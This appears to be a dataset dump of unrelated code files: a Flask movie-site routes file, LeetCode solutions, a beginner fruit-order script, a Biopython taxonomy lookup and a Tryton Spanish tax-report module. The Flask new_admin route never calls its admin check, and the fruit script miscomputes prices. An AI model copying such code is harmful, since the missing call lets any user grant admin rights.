movies.delete_movie(movie_id)\n return redirect(\"/\")\n\n@app.route(\"/delete_movie_from_category\", methods=[\"POST\"])\ndef delete_movie_from_category():\n users.require_admin()\n users.check_csrf()\n movie_id = request.form[\"movie_id\"]\n category_id = request.form[\"category_id\"]\n if categories.delete_movie_in_category(movie_id, category_id):\n return redirect(\"/category_page/\" + str(category_id))\n else:\n return render_template(\"category_issue.html\", message=\"Elokuvan poistaminen kategoriasta epäonnistui\", id=category_id)\n\n@app.route(\"/admins\")\ndef admins():\n users.require_admin()\n admins = users.list_admins()\n number_of_admins = users.get_number_of_admins()\n return render_template(\"admins.html\", admins=admins, number_of_admins=number_of_admins)\n\n@app.route(\"/new_admin\", methods=[\"POST\"])\ndef new_admin():\n users.require_admin\n users.check_csrf()\n username = request.form[\"username\"]\n if len(username) <= 1 or len(username) >= 20:\n return render_template(\"admins_issue.html\", message=\"Käyttäjätunnuksessa oltava 1-20 merkkiä\")\n if not users.username_exists_already(username):\n return render_template(\"admins_issue.html\", message=\"Käyttäjää ei löydy.\")\n if users.check_if_admin(username):\n return render_template(\"admins_issue.html\", message=\"Kyseinen käyttäjä on jo ylläpitäjä.\")\n if users.turn_user_into_admin(username):\n return redirect(\"/admins\")\n else:\n render_template(\"admins_issue.html\", message=\"Käyttäjän muuttaminen ylläpitäjäksi epäonnistui\")\n\n@app.route(\"/test\")\ndef test():\n return render_template(\"layout.html\")","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"315080775","text":"# http://oj.leetcode.com/problems/linked-list-cycle-ii/\n# http://fisherlei.blogspot.com/2013/11/leetcode-linked-list-cycle-ii-solution.html\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n\t# @param head, a ListNode\n\t# @return a list node\n\tdef detectCycle(self, head):\n\t\tif head == None:\n\t\t\treturn None\n\t\tfast = head\n\t\tslow = head\n\t\thasCycle = 0\n\t\twhile fast and fast.next:\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next.next\n\t\t\tif slow == fast:\n\t\t\t\thasCycle = 1\n\t\t\t\tbreak\n\t\tif hasCycle == 0:\n\t\t\treturn None\n\t\tslow = head\n\t\twhile slow != fast:\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next\n\t\treturn fast\n","sub_path":"linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"93623001","text":"\"\"\"\r\neasy 2021-05-18 单调递减栈\r\n通过Stack、HashMap解决\r\n先遍历大数组nums2,首先将第一个元素入栈;\r\n继续遍历,当当前元素小于栈顶元素时,继续将它入栈;当当前元素大于栈顶元素时,栈顶元素出栈,此时应将该出栈的元素与当前元素形成key-value键值对,存入HashMap中;\r\n当遍历完nums2后,得到nums2中元素所对应的下一个更大元素的hash表;\r\n遍历nums1的元素在hashMap中去查找‘下一个更大元素’,当找不到时则为-1。\r\n\"\"\"\r\n# 2021-12-16\r\n# 寻找比当前cur大的元素-->单调递减栈\r\nclass Solution(object):\r\n def nextGreaterElement(self, nums1, nums2):\r\n stk, hashmap = [], {}\r\n # 维护单调递减栈,栈内存的是index\r\n for i in range(len(nums2)):\r\n # 如果item比栈顶元素大,则栈顶元素一定是没有用的【单调栈模板】\r\n while stk and nums2[i]>nums2[stk[-1]]:\r\n # 操作\r\n index_t = stk.pop() # # 比item大的元素就是栈顶元素\r\n hashmap[nums2[index_t]] = nums2[i]\r\n stk.append(i)\r\n\r\n # 再遍历一次nums1\r\n res = [hashmap.get(x, -1) for x in nums1]\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n nums1 = [2, 1, 3]\r\n nums2 = [2, 3, 1]\r\n myresult = Solution()\r\n print(myresult.nextGreaterElement(nums1, nums2))","sub_path":"11_单调栈/496-下一个更大元素 I.py","file_name":"496-下一个更大元素 I.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206373159","text":"my_fruit_tuple=(\"apple\",\"banana\",\"watermelon\")\n\nmy_cost_tuple=(10,7,20)\nconsumer_number=[]\nconsumer_list=[]\nconsumer_cost=[]\nselector=int(input(\"to creat order press 1: \\nto print order press 2:\\nto exit press 3:\"))\ny=1\nz=1;\nz=0\nwhile(selector>0):\n\twhile(y>0):\n\t\tconsumer_number.append(z)\n\t\tselected_fruit=input(\"enter your fruit:\")\n\t\tselected_fruit_quantity=input(\"enter your quantity:\")\n\t\tmy_cost_tuple_counter =0\n\n\t\tfor i in my_fruit_tuple:\n\t\t\tif (i==selected_fruit) :\n\t\t\t\tconsumer_list.append(i)\n\t\t\t\tconsumer_cost.append( my_cost_tuple[my_cost_tuple_counter] *(int(selected_fruit_quantity)))\n\t\t\t\tmy_cost_tuple_counter+=1\n\t\t\t\tbreak\n\t\telse :\n\t\t\tprint(f\"sorry your {selected_fruit} fruit dosent exist\")\n\t\t\tz=z-1\t\t\t\t\n\t\tz+=1\t\t\t\n\t\tmy_cost_tuple_counter=0\n\t\ty=int(input (\"TO ADD ELEMENT--> press 1 \\nTO EXIT --> press 0 \\n\"))\n\t\t\n\t\n\t\t\t#x=my_fruit_tuple.index(\"apple\")\n\t\t\t\n\t\t\t#consumer_cost.append(my_cost_tuple(my_fruit_tuple.index(i))*selected_fruit_quantity)\n\tselector=int(input(\"to creat order press 1: \\nto print order press 2:\\nto exit press 3:\"))\n\n\tif (selector==2):\n\t\tprint (\"_______THANK U_____\")\n\t\tprint (\"_______You bought_____\")\n\t\tprint (consumer_list)\n\t\tprint (\"_______respectively cost_____\")\n\t\tprint (consumer_cost)\n\t\ttotal_cost=0\n\t\tfor j in range (z):\n\t\t\ttotal_cost+=consumer_cost[j]\n\t\tprint (\"_______TOtal cost_____\")\n\t\tprint (f\"total cost ={total_cost}\")\n\t\tprint (\"__Let we see u again!__\")\n\ttotal_cost=0\n\t\t\t\n\t\t\n","sub_path":"lec4/assigenment.py","file_name":"assigenment.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624194610","text":"from Bio import Phylo, Entrez\nfrom os.path import dirname, abspath\nimport csv, os\nimport pandas as pd\nimport numpy as np\nEntrez.email = 'td1515@ic.ac.uk'\n\n#~~~~~~~~~~~~~~~~~~~~~\n# GET A LIST OF NODES\n#~~~~~~~~~~~~~~~~~~~~~\n\n# define a function that makes a dictionary, node names are the heys\ndef lookup_by_names(tree):\n names = {}\n for clade in tree.find_clades():\n if clade.name:\n if clade.name in names:\n raise ValueError(\"Duplicate key: %s\" % clade.name)\n names[clade.name] = clade\n return names # spits out a dictionary where the keys are the node names, values are Clade(branch_length=value, name=same as key)\n\ntree = Phylo.read('Campylobacterota.tree', 'newick') # open the tree file \nnames = lookup_by_names(tree) # use the function to get the dictionary\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# SAVE SPECIES NAMES AND ASSEMBLY ACCESSIONS IN A TABLE\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ntable = 'nodes-species_accession.tsv' # filename of the table\n\n#if the table already exists, delete it. we wanna write a new one not append to the incorrect one\nfile_exists = os.path.isfile(table)\nif file_exists:\n\tos.remove(table)\n\nwith open(table, 'w+') as acc: # make and open the table file\n\twrite = csv.writer(acc, delimiter='\\t')\n\twrite.writerow(['species', 'accession']) # put in the headers\n\tfor node in names:\n\t\tif node.find('GCF_') != -1 or node.find('GCA_') != -1: #if gcf/gca is provided\n\t\t\tspecies = ' '.join(node.split('_')[:-2])\n\t\t\tgcf = '_'.join(node.split('_')[-2:])\n\t\t\tls = [species, gcf] # split the name from the accession and save them as a list \n\t\telse: # if uba is provided\n\t\t\tspecies = ' '.join(node.split('_', 2)[:-1])\n\t\t\tuba = ''.join(node.split('_', 2)[-1])\n\t\t\tls = [species, uba] # split the name from the accession and save them as a list \n\t\twrite.writerow(ls) # write the list as a line in the csv\nprint('wrote the species+accession table')\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~\n# REOPEN FILE, ADD TAXID \n#~~~~~~~~~~~~~~~~~~~~~~~~~\n\nparentdir = dirname(dirname(dirname(abspath(__file__))))\nref = parentdir + '/datalocal/bacteria_assembly_summary_refseq_minimal.tsv'\ngen = parentdir + '/datalocal/bacteria_assembly_summary_genbank_minimal.tsv'\n\ndf = pd.read_csv(table, sep='\\t')\nrefseq = pd.read_csv(ref, sep='\\t')\ngenbank = pd.read_csv(gen, sep='\\t')\ndf = df.reindex(columns=df.columns.tolist() + ['taxid', 'species_taxid']) #add two columns to the species_accession table\n\n#define function to fetch taxid from entrez if UBA is provided:\ndef get_entrez_id(accession):\n\thandle = Entrez.esearch(db='assembly', term=accession)\n\trecord = Entrez.read(handle)\n\tids = record['IdList']\n\treturn ids\n\n#fetch summary of the assembly identified with the id, return the uba, gca, and gcf numbers.\ndef fetch_taxid(ids):\n\thandle = Entrez.esummary(db='assembly', id=ids, report='full')\n\trecord = Entrez.read(handle, validate=False)\n\tsummary = record['DocumentSummarySet']['DocumentSummary'][0]\n\ttaxid = summary['Taxid']\n\tspecies_taxid = summary['SpeciesTaxid']\n\treturn taxid, species_taxid\n\n\ndef find_taxid(nodes_df):\n\tfor index, gcf in nodes_df['accession'].iteritems():\n\t\tif gcf.find('GCF_') != -1: # if the accession is gcf\n\t\t\thit = refseq.loc[refseq['assembly_accession'] == gcf] #look for it in refseq\n\t\t\tif hit.empty: #if its not in refseq, find it in genbank\n\t\t\t\thit = genbank.loc[genbank['gbrs_paired_asm'] == gcf]\n\t\t\tcol1 = list(hit['taxid']) #extract the taxid and species taxid\n\t\t\tcol2 = list(hit['species_taxid']) \n\t\t\tif len(col1) != 1 or len(col2) != 1: #these two rows check for if you get more than one hit, it tells you what gcf caused this. \n\t\t\t\tprint(gcf)\n\t\t\tnodes_df.iloc[index, [2]] = col1 #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = col2\n\t\telif gcf.find('GCA_') != -1: #same thing for if the assembly accession is gca. but the assembly_accession and gbrs_paired_asm columns are flipped\n\t\t\thit = refseq.loc[refseq['gbrs_paired_asm'] == gcf]\n\t\t\tif hit.empty:\n\t\t\t\thit = genbank.loc[genbank['assembly_accession'] == gcf]\n\t\t\tcol1 = list(hit['taxid'])\n\t\t\tcol2 = list(hit['species_taxid'])\n\t\t\tif len(col1) != 1 or len(col2) != 1:\n\t\t\t\tprint(gcf)\n\t\t\tnodes_df.iloc[index, [2]] = col1 #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = col2\n\t\telse:\n\t\t\tentrez_id = get_entrez_id(gcf)\n\t\t\ttax, sp_tax = fetch_taxid(entrez_id)\n\t\t\tnodes_df.iloc[index, [2]] = tax #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = sp_tax\n\treturn nodes_df\n\nresult = find_taxid(df)\nresult[['taxid', 'species_taxid']] = result[['taxid', 'species_taxid']].fillna(0.0).astype(int) # change the numbers from floats to integers \n\nresult.to_csv('nodes-species_accession_taxid.tsv', sep='\\t', index=False) #save as a table\nprint('wrote the species+accession+taxid table')\n","sub_path":"waite-tree/get_node_names_taxids.py","file_name":"get_node_names_taxids.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"316987765","text":"# This file is part of Tryton. The COPYRIGHT file at the top level of\n# this repository contains the full copyright notices and license terms.\nimport unicodedata\n\nfrom collections import defaultdict\nfrom dateutil.relativedelta import relativedelta\nfrom decimal import Decimal\nfrom operator import attrgetter\n\nfrom sql import Cast, Null, Literal\nfrom sql.aggregate import Count, Min, Sum\nfrom sql.conditionals import Case\nfrom sql.functions import Substring, Position, Extract, CurrentTimestamp\nfrom sql.operators import Exists\n\nfrom trytond.i18n import gettext\nfrom trytond.model import ModelSQL, ModelView, fields\nfrom trytond.model.modelsql import convert_from\nfrom trytond.pool import Pool\nfrom trytond.pyson import Eval, If\nfrom trytond.report import Report\nfrom trytond.transaction import Transaction\nfrom trytond.wizard import Wizard, StateView, StateTransition, StateReport, \\\n Button\nfrom trytond.modules.account_eu.account import ECSalesList, ECSalesListContext\n\nfrom .exceptions import PrintError\n\n# XXX fix: https://genshi.edgewall.org/ticket/582\nfrom genshi.template.astutil import ASTCodeGenerator, ASTTransformer\nif not hasattr(ASTCodeGenerator, 'visit_NameConstant'):\n def visit_NameConstant(self, node):\n if node.value is None:\n self._write('None')\n elif node.value is True:\n self._write('True')\n elif node.value is False:\n self._write('False')\n else:\n raise Exception(\"Unknown NameConstant %r\" % (node.value,))\n ASTCodeGenerator.visit_NameConstant = visit_NameConstant\nif not hasattr(ASTTransformer, 'visit_NameConstant'):\n # Re-use visit_Name because _clone is deleted\n ASTTransformer.visit_NameConstant = ASTTransformer.visit_Name\n\n\ndef justify(string, size):\n return string[:size].ljust(size)\n\n\ndef format_decimal(n, include_sign=False):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n sign = ''\n if include_sign:\n sign = 'N' if n < 0 else ''\n return sign + ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n 17 - len(sign), '0')\n\n\ndef format_integer(n, size=8):\n return ('%d' % n).rjust(size, '0')\n\n\ndef format_percentage(n, size=5):\n return ('{0:.2f}'.format(n)).replace('.', '').rjust(size, '0')\n\n\ndef identifier_code(identifier):\n if identifier:\n return identifier.es_code()\n return ''\n\n\ndef country_code(record):\n code = None\n if record.party_tax_identifier:\n code = record.party_tax_identifier.es_country()\n if code is None or code == 'ES':\n return ''\n return code\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\nclass AEATReport(Report):\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Period = pool.get('account.period')\n context = super().get_context(records, data)\n\n periods = sorted(\n Period.browse(data['periods']), key=attrgetter('start_date'))\n\n context['year'] = str(periods[0].start_date.year)\n context['company'] = periods[0].fiscalyear.company\n\n start_month = periods[0].start_date.month\n end_month = periods[-1].end_date.month\n if end_month - start_month > 0:\n context['period'] = str(end_month // 3) + 'T'\n else:\n context['period'] = str(start_month).rjust(2, '0')\n\n context['justify'] = justify\n context['format_decimal'] = format_decimal\n context['format_integer'] = format_integer\n context['format_percentage'] = format_percentage\n\n with Transaction().set_context(periods=data['periods']):\n context['amounts'] = cls.compute_amounts()\n\n return context\n\n @classmethod\n def compute_amounts(cls):\n amounts = defaultdict(Decimal)\n for tax_code in cls.tax_codes():\n amounts[tax_code.code] += tax_code.amount\n return amounts\n\n @classmethod\n def tax_codes(cls):\n pool = Pool()\n TaxCode = pool.get('account.tax.code')\n return TaxCode.search([('aeat_report', '=', cls._aeat_report)])\n\n\nclass AEATPartyReport(AEATReport):\n\n @classmethod\n def aeat_party_expression(cls, tables):\n '''\n Returns a couple of sql expression and tables used by sql query to\n compute the aeat party.\n '''\n pool = Pool()\n Invoice = pool.get('account.invoice')\n\n table, _ = tables[None]\n is_invoice = table.origin.like(Invoice.__name__ + ',%')\n\n if 'invoice' in tables:\n invoice, _ = tables['invoice']\n else:\n invoice = Invoice.__table__()\n tables['invoice'] = {\n None: (invoice, (is_invoice\n & (invoice.id == Cast(\n Substring(table.origin,\n Position(',', table.origin) + Literal(1)),\n Invoice.id.sql_type().base)))),\n }\n\n return Case((is_invoice, invoice.party), else_=Null), tables\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Tax = pool.get('account.tax')\n\n context = super().get_context(records, data)\n cursor = Transaction().connection.cursor()\n\n move = Move.__table__()\n move_line = Line.__table__()\n tax_line = TaxLine.__table__()\n\n tables = {\n None: (move, None),\n 'lines': {\n None: (move_line, move_line.move == move.id),\n 'tax_lines': {\n None: (tax_line, tax_line.move_line == move_line.id),\n },\n },\n }\n\n expression, tables = cls.aeat_party_expression(tables)\n\n parties = defaultdict(int)\n for tax_code in cls.tax_codes():\n domain = ['OR']\n for line in tax_code.lines:\n domain.append(line._line_domain)\n\n with Transaction().set_context(periods=data['periods']):\n tax_line_domain = [Tax._amount_domain(), domain]\n _, where = Move.search_domain([\n ('lines', 'where', [\n ('tax_lines', 'where', tax_line_domain),\n ]),\n ], tables=tables)\n\n from_ = convert_from(None, tables)\n cursor.execute(*from_.select(\n expression, where=where, group_by=(expression,)).select(\n Count(Literal('*'))))\n row = cursor.fetchone()\n if row:\n parties[tax_code.code] += row[0]\n context['parties'] = parties\n return context\n\n\nclass AEAT111(AEATPartyReport):\n __name__ = 'account.reporting.aeat111'\n _aeat_report = '111'\n\n @classmethod\n def get_context(cls, records, data):\n context = super().get_context(records, data)\n amounts = context['amounts']\n for code in ['28', '30']:\n assert code not in amounts, (\n \"computed code %s already defined\" % code)\n amounts['28'] = (amounts['03'] + amounts['06'] + amounts['09']\n + amounts['12'] + amounts['15'] + amounts['18'] + amounts['21']\n + amounts['24'] + amounts['27'])\n amounts['30'] = amounts['28'] - amounts['29']\n return context\n\n\nclass AEAT115(AEATPartyReport):\n __name__ = 'account.reporting.aeat115'\n _aeat_report = '115'\n\n @classmethod\n def get_context(cls, records, data):\n context = super().get_context(records, data)\n amounts = context['amounts']\n assert '05' not in amounts, (\n \"computed code 05 already defined\")\n amounts['05'] = amounts['03'] - amounts['04']\n return context\n\n\nclass AEAT303(AEATReport):\n __name__ = 'account.reporting.aeat303'\n _aeat_report = '303'\n\n @classmethod\n def compute_amounts(cls):\n amounts = super().compute_amounts()\n amounts['65'] = 100.0\n return amounts\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Period = pool.get('account.period')\n Account = pool.get('account.account')\n TaxCodeLine = pool.get('account.tax.code.line')\n transaction = Transaction()\n context = super().get_context(records, data)\n amounts = context['amounts']\n\n periods = Period.browse(data['periods'])\n start_date = periods[0].start_date\n end_date = periods[-1].end_date\n\n lines = TaxCodeLine.search([\n ('code', 'in', cls.tax_codes()),\n ('code.code', 'in', ['03', '06', '09', '18', '21', '24']),\n ('tax', 'where', [\n ('type', '=', 'percentage'),\n ['OR',\n ('start_date', '=', None),\n ('start_date', '<=', end_date),\n ],\n ['OR',\n ('end_date', '=', None),\n ('end_date', '>=', start_date),\n ],\n ]),\n ])\n for line in lines:\n code = str(int(line.code.code) - 1).rjust(2, '0')\n amounts[code] = float(line.tax.rate * Decimal(100))\n\n amount_to_compensate = Decimal(0)\n fiscalyear = periods[0].fiscalyear\n with transaction.set_context({\n 'fiscalyear': fiscalyear.id,\n 'to_date': end_date,\n }):\n for account in Account.search([\n ('company', '=', fiscalyear.company.id),\n ('code', 'like', '4700%'),\n ]):\n amount_to_compensate += account.balance\n\n for code in ['46', '64', '66', '67', '69', '71', '88']:\n assert code not in amounts, (\n \"computed code %s already defined\" % code)\n amounts['46'] = amounts['27'] - amounts['45']\n amounts['64'] = amounts['46'] + amounts['58'] + amounts['76']\n amounts['66'] = amounts['64'] * Decimal(amounts['65']) / Decimal(100.0)\n amounts['67'] = amount_to_compensate\n amounts['69'] = (amounts['66'] + amounts['77'] - amounts['67']\n + amounts['68'])\n amounts['71'] = (amounts['69'] - amounts['70'])\n amounts['88'] = (amounts['80'] + amounts['81'] - amounts['93']\n + amounts['94'] + amounts['83'] + amounts['84'] + amounts['85']\n + amounts['86'] + amounts['95'] + amounts['96'] + amounts['97']\n + amounts['98'] - amounts['79'] - amounts['99'])\n\n last_period = [p for p in periods[0].fiscalyear.periods\n if p.type == 'standard'][-1]\n declaration_type = 'N'\n if amounts['69'] > 0:\n declaration_type = 'I'\n elif amounts['69'] < 0:\n declaration_type = 'D' if last_period in periods else 'C'\n context['declaration_type'] = declaration_type\n return context\n\n\nclass PrintAEATStart(ModelView):\n 'Print AEAT Start'\n __name__ = 'account.reporting.aeat.start'\n\n report = fields.Selection([\n ('111', \"Model 111\"),\n ('115', \"Model 115\"),\n ('303', \"Model 303\"),\n ], \"Report\", required=True)\n periods = fields.Many2Many('account.period', None, None, 'Periods',\n required=True)\n\n\nclass PrintAEAT(Wizard):\n 'Print AEAT'\n __name__ = 'account.reporting.aeat'\n start = StateView('account.reporting.aeat.start',\n 'account_es.print_aeat_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Print', 'choice', 'tryton-ok', default=True),\n ])\n choice = StateTransition()\n model_111 = StateReport('account.reporting.aeat111')\n model_115 = StateReport('account.reporting.aeat115')\n model_303 = StateReport('account.reporting.aeat303')\n\n def transition_choice(self):\n validate = getattr(self, 'validate_%s' % self.start.report, None)\n if validate:\n validate()\n return 'model_%s' % self.start.report\n\n def open_report(self, action):\n return action, {'periods': [p.id for p in self.start.periods]}\n\n do_model_111 = open_report\n do_model_115 = open_report\n do_model_303 = open_report\n\n def validate_303(self):\n if len(set(p.fiscalyear for p in self.start.periods)) > 1:\n raise PrintError(\n gettext('account_es.msg_report_same_fiscalyear'))\n\n\nclass ESVATList(ModelSQL, ModelView):\n \"Spanish VAT List\"\n __name__ = 'account.reporting.vat_list_es'\n\n company_tax_identifier = fields.Many2One(\n 'party.identifier', \"Company Tax Identifier\")\n party_tax_identifier = fields.Many2One(\n 'party.identifier', \"Party Tax Identifier\")\n party = fields.Many2One('party.party', \"Party\")\n province_code = fields.Function(fields.Char(\"Province Code\"),\n 'get_province_code', searcher='search_province_code')\n code = fields.Char(\"Code\")\n amount = fields.Numeric(\n \"Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n first_period_amount = fields.Numeric(\n \"First Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n second_period_amount = fields.Numeric(\n \"Second Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n third_period_amount = fields.Numeric(\n \"Third Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n fourth_period_amount = fields.Numeric(\n \"Fourth Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n currency = fields.Many2One('currency.currency', \"Currency\")\n currency_digits = fields.Function(\n fields.Integer(\"Currency Digits\"), 'get_currency_digits')\n\n def get_currency_digits(self, name):\n return self.currency.digits\n\n @classmethod\n def get_province_code(cls, records, name):\n return {r.id: r.party.es_province_code or '' if r.party else ''\n for r in records}\n\n @classmethod\n def search_province_code(cls, name, clause):\n return [(('party.es_province_code',) + tuple(clause[1:]))]\n\n @classmethod\n def excluded_tax_codes(cls):\n return ['111', '115']\n\n @classmethod\n def table_query(cls):\n pool = Pool()\n Company = pool.get('company.company')\n Invoice = pool.get('account.invoice')\n InvoiceTax = pool.get('account.invoice.tax')\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Tax = pool.get('account.tax')\n TaxCode = pool.get('account.tax.code')\n TaxCodeLine = pool.get('account.tax.code.line')\n Date = pool.get('ir.date')\n context = Transaction().context\n company = Company.__table__()\n invoice = Invoice.__table__()\n cancel_invoice = Invoice.__table__()\n move = Move.__table__()\n line = Line.__table__()\n tax_line = TaxLine.__table__()\n tax = Tax.__table__()\n tax_code = TaxCode.__table__()\n tax_code_line = TaxCodeLine.__table__()\n exclude_invoice_tax = InvoiceTax.__table__()\n\n amount = tax_line.amount\n month = Extract('MONTH', invoice.invoice_date)\n\n excluded_taxes = (tax_code_line\n .join(tax_code,\n condition=(tax_code.id == tax_code_line.code)\n ).select(\n tax_code_line.tax, distinct=True,\n where=tax_code.aeat_report.in_(cls.excluded_tax_codes())))\n\n where = ((invoice.company == context.get('company'))\n & (invoice.state.in_(['posted', 'paid']))\n & (tax.es_vat_list_code != Null)\n & (Extract('year', invoice.invoice_date)\n == context.get('date', Date.today()).year)\n & ~Exists(cancel_invoice.select(\n cancel_invoice.cancel_move, distinct=True,\n where=(cancel_invoice.cancel_move == invoice.move)))\n # Use exists to exclude the full invoice when it has multiple taxes\n & ~Exists(exclude_invoice_tax.select(\n exclude_invoice_tax.invoice,\n where=((exclude_invoice_tax.invoice == invoice.id)\n & (exclude_invoice_tax.tax.in_(excluded_taxes))))))\n return (tax_line\n .join(tax, condition=tax_line.tax == tax.id)\n .join(line, condition=tax_line.move_line == line.id)\n .join(move, condition=line.move == move.id)\n .join(invoice, condition=invoice.move == move.id)\n .join(company, condition=company.id == invoice.company)\n .select(\n Min(tax_line.id).as_('id'),\n Literal(0).as_('create_uid'),\n CurrentTimestamp().as_('create_date'),\n cls.write_uid.sql_cast(Literal(Null)).as_('write_uid'),\n cls.write_date.sql_cast(Literal(Null)).as_('write_date'),\n invoice.tax_identifier.as_('company_tax_identifier'),\n invoice.party.as_('party'),\n invoice.party_tax_identifier.as_('party_tax_identifier'),\n tax.es_vat_list_code.as_('code'),\n Sum(amount).as_('amount'),\n Sum(amount, filter_=month <= Literal(3)).as_(\n 'first_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(3)) & (month <= Literal(6)))).as_(\n 'second_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(6)) & (month <= Literal(9)))).as_(\n 'third_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(9)) & (month <= Literal(12)))).as_(\n 'fourth_period_amount'),\n company.currency.as_('currency'),\n where=where,\n group_by=[\n invoice.tax_identifier,\n invoice.type,\n invoice.party,\n invoice.party_tax_identifier,\n company.currency,\n tax.es_vat_list_code,\n ]))\n\n\nclass ESVATListContext(ModelView):\n \"Spanish VAT List Context\"\n __name__ = 'account.reporting.vat_list_es.context'\n\n company = fields.Many2One('company.company', \"Company\", required=True)\n date = fields.Date(\"Date\", required=True,\n context={'date_format': '%Y'})\n\n @classmethod\n def default_company(cls):\n return Transaction().context.get('company')\n\n @classmethod\n def default_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n return Date.today()\n\n\nclass AEAT347(Report):\n __name__ = 'account.reporting.aeat347'\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Company = pool.get('company.company')\n t_context = Transaction().context\n\n context = super().get_context(records, data)\n\n context['year'] = str(t_context['date'].year)\n context['company'] = Company(t_context['company'])\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n context['justify'] = justify\n\n def format_decimal(n):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n sign = 'N' if n < 0 else ' '\n return sign + ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n 15, '0')\n context['format_decimal'] = format_decimal\n context['format_integer'] = format_integer\n context['identifier_code'] = identifier_code\n context['country_code'] = country_code\n context['strip_accents'] = strip_accents\n\n return context\n\n\nclass ECOperationList(ECSalesList):\n \"EC Operation List\"\n __name__ = 'account.reporting.es_ec_operation_list'\n\n @classmethod\n def table_query(cls):\n pool = Pool()\n Company = pool.get('company.company')\n Invoice = pool.get('account.invoice')\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Period = pool.get('account.period')\n Tax = pool.get('account.tax')\n context = Transaction().context\n company = Company.__table__()\n invoice = Invoice.__table__()\n move = Move.__table__()\n line = Line.__table__()\n tax_line = TaxLine.__table__()\n period = Period.__table__()\n tax = Tax.__table__()\n\n sales = super().table_query()\n\n where = invoice.company == context.get('company')\n if context.get('start_date'):\n where &= (move.date >= context.get('start_date'))\n if context.get('end_date'):\n where &= (move.date <= context.get('end_date'))\n where &= ((tax.es_ec_purchases_list_code != Null)\n & (tax.es_ec_purchases_list_code != ''))\n where &= tax_line.type == 'base'\n where &= invoice.type == 'in'\n purchases = (tax_line\n .join(tax, condition=tax_line.tax == tax.id)\n .join(line, condition=tax_line.move_line == line.id)\n .join(move, condition=line.move == move.id)\n .join(period, condition=move.period == period.id)\n .join(invoice, condition=invoice.move == move.id)\n .join(company, condition=company.id == invoice.company)\n .select(\n Min(tax_line.id).as_('id'),\n Literal(0).as_('create_uid'),\n CurrentTimestamp().as_('create_date'),\n cls.write_uid.sql_cast(Literal(Null)).as_('write_uid'),\n cls.write_date.sql_cast(Literal(Null)).as_('write_date'),\n invoice.tax_identifier.as_('company_tax_identifier'),\n invoice.party.as_('party'),\n invoice.party_tax_identifier.as_('party_tax_identifier'),\n tax.es_ec_purchases_list_code.as_('code'),\n Sum(tax_line.amount).as_('amount'),\n company.currency.as_('currency'),\n where=where,\n group_by=[\n invoice.tax_identifier,\n invoice.party,\n invoice.party_tax_identifier,\n tax.es_ec_purchases_list_code,\n company.currency,\n ]))\n return sales | purchases\n\n\nclass ECOperationListContext(ECSalesListContext):\n \"EC Operation List Context\"\n __name__ = 'account.reporting.es_ec_operation_list.context'\n\n start_date = fields.Date(\"Start Date\",\n domain=[\n If(Eval('end_date'),\n ('start_date', '<=', Eval('end_date')),\n (),\n ),\n ],\n depends=['end_date'])\n end_date = fields.Date(\"End Date\",\n domain=[\n If(Eval('start_date'),\n ('end_date', '>=', Eval('start_date')),\n (),\n ),\n ],\n depends=['start_date'])\n\n @classmethod\n def default_start_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n return Date.today() - relativedelta(months=1, day=1)\n\n @classmethod\n def default_end_date(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n return Date.today() - relativedelta(months=1, day=31)\n\n\nclass AEAT349(Report):\n __name__ = 'account.reporting.aeat349'\n\n @classmethod\n def get_context(cls, 